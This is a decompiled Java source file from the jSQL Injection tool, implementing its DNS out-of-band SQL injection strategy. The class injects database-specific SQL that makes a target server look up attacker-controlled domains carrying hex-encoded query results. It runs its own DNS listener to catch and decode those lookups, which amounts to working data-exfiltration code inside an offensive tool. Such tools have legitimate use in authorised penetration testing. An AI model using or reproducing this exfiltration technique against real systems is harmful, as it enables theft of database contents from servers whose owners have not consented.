/*
 * Decompiled with CFR 0.152.
 */
package com.jsql.model.injection.strategy;

import com.jsql.model.InjectionModel;
import com.jsql.model.injection.strategy.AbstractStrategy;
import com.jsql.model.injection.strategy.DnsServer;
import com.jsql.model.injection.strategy.blind.AbstractInjectionBit;
import com.jsql.model.suspendable.AbstractSuspendable;
import com.jsql.util.I18nUtil;
import com.jsql.util.LogLevelUtil;
import com.jsql.util.StringUtil;
import com.jsql.view.subscriber.Seal;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import org.apache.commons.lang3.StringUtils;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.util.Supplier;

public class StrategyDns
extends AbstractStrategy {
    private static final Logger LOGGER = LogManager.getRootLogger();
    private AbstractInjectionBit.BlindOperator blindOperator;
    private final DnsServer dnsServer;

    public StrategyDns(InjectionModel injectionModel) {
        super(injectionModel);
        this.dnsServer = new DnsServer(injectionModel);
    }

    @Override
    public void checkApplicability() {
        if (this.injectionModel.getMediatorUtils().preferencesUtil().isStrategyDnsDisabled()) {
            LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Skipping strategy [{}] disabled", (Object)this.getName());
            return;
        }
        if (StringUtils.isBlank(this.injectionModel.getMediatorUtils().preferencesUtil().getDnsDomain()) || !StringUtils.isNumeric(this.injectionModel.getMediatorUtils().preferencesUtil().getDnsPort())) {
            LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Incorrect domain '{}' or port '{}', skipping Dns strategy", (Object)this.injectionModel.getMediatorUtils().preferencesUtil().getDnsDomain(), (Object)this.injectionModel.getMediatorUtils().preferencesUtil().getDnsPort());
            return;
        }
        if (StringUtils.isEmpty(this.injectionModel.getMediatorEngine().getEngine().instance().getModelYaml().getStrategy().getDns())) {
            LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Strategy [{}] for [{}] not implemented, share a working example on GitHub to speed up release", (Object)this.getName(), (Object)this.injectionModel.getMediatorEngine().getEngine());
            return;
        }
        this.checkInjection(AbstractInjectionBit.BlindOperator.OR);
        this.checkInjection(AbstractInjectionBit.BlindOperator.AND);
        this.checkInjection(AbstractInjectionBit.BlindOperator.STACK);
        this.checkInjection(AbstractInjectionBit.BlindOperator.NO_MODE);
        if (this.isApplicable) {
            this.allow(new int[0]);
        } else {
            this.unallow(new int[0]);
        }
    }

    private void checkInjection(AbstractInjectionBit.BlindOperator blindOperator) {
        if (this.isApplicable) {
            return;
        }
        this.blindOperator = blindOperator;
        LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "{} [{}] with [{}]...", () -> I18nUtil.valueByKey("LOG_CHECKING_STRATEGY"), this::getName, () -> blindOperator);
        String engineSpecificWithOperator = this.injectionModel.getMediatorEngine().getEngine().instance().sqlDns(String.format("(select concat('', %s))", this.injectionModel.getMediatorEngine().getEngine().instance().getModelYaml().getStrategy().getConfiguration().getFailsafe().replace("${indice}", "1")), "1", blindOperator, false);
        new Thread(this.dnsServer::listen).start();
        this.injectionModel.injectWithoutIndex(engineSpecificWithOperator, "dns#confirm");
        this.waitDnsResponse(2500);
        String domainName = this.injectionModel.getMediatorUtils().preferencesUtil().getDnsDomain();
        this.isApplicable = this.dnsServer.getResults().stream().anyMatch(s -> s.contains(domainName) && s.contains(StringUtil.toHex("133717331")));
        if (this.isApplicable) {
            this.dnsServer.getResults().clear();
            Supplier[] supplierArray = new Supplier[3];
            supplierArray[0] = () -> I18nUtil.valueByKey("LOG_VULNERABLE");
            supplierArray[1] = this::getName;
            supplierArray[2] = this.blindOperator::name;
            LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "{} [{}] with [{}]", supplierArray);
        } else {
            this.dnsServer.close();
        }
    }

    @Override
    public void allow(int ... i) {
        this.injectionModel.appendAnalysisReport(StringUtil.formatReport(LogLevelUtil.COLOR_BLU, "### Strategy: " + this.getName()) + this.injectionModel.getReportWithoutIndex(this.injectionModel.getMediatorEngine().getEngine().instance().sqlDns(StringUtil.formatReport(LogLevelUtil.COLOR_GREEN, "&lt;query&gt;"), "1", this.blindOperator, true), "metadataInjectionProcess", null));
        this.injectionModel.sendToViews(new Seal.MarkStrategyVulnerable(this));
    }

    @Override
    public void unallow(int ... i) {
        this.injectionModel.sendToViews(new Seal.MarkStrategyInvulnerable(this));
    }

    @Override
    public String inject(String sqlQuery, String startPosition, AbstractSuspendable stoppable, String metadataInjectionProcess) {
        new Thread(() -> this.injectionModel.injectWithoutIndex(this.injectionModel.getMediatorEngine().getEngine().instance().sqlDns(sqlQuery, startPosition, this.blindOperator, false), metadataInjectionProcess)).start();
        this.waitDnsResponse(5000);
        String result = this.dnsServer.getResults().getFirst();
        String domainName = this.injectionModel.getMediatorUtils().preferencesUtil().getDnsDomain();
        String regexToMatchTamperTags = String.format("(?i).{3}\\.([a-z0-9]*)\\..{3}\\.%s\\.", domainName);
        Matcher matcherSql = Pattern.compile(regexToMatchTamperTags).matcher(result);
        if (matcherSql.find()) {
            result = matcherSql.group(1);
        } else {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Incorrect DNS response: {}", (Object)result);
        }
        this.dnsServer.getResults().clear();
        return StringUtil.fromHex(result);
    }

    private void waitDnsResponse(int maxTime) {
        int currentTime = 0;
        while (this.dnsServer.getResults().isEmpty() && currentTime <= maxTime) {
            try {
                int waitTime = 250;
                Thread.sleep(waitTime);
                currentTime += waitTime;
            }
            catch (InterruptedException e) {
                LOGGER.log(LogLevelUtil.IGNORE, e, (Throwable)e);
                Thread.currentThread().interrupt();
            }
        }
        if (currentTime > maxTime) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Missing DNS response after {} ms", (Object)maxTime);
        }
    }

    @Override
    public void activateWhenApplicable() {
        if (this.injectionModel.getMediatorStrategy().getStrategy() == null && this.isApplicable()) {
            Supplier[] supplierArray = new Supplier[3];
            supplierArray[0] = () -> I18nUtil.valueByKey("LOG_USING_STRATEGY");
            supplierArray[1] = this::getName;
            supplierArray[2] = this.blindOperator::name;
            LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "{} [{}] with [{}]", supplierArray);
            this.injectionModel.getMediatorStrategy().setStrategy(this);
            this.injectionModel.sendToViews(new Seal.ActivateStrategy(this));
        }
    }

    @Override
    public String getPerformanceLength() {
        return "65565";
    }

    @Override
    public String getName() {
        return "Dns";
    }
}

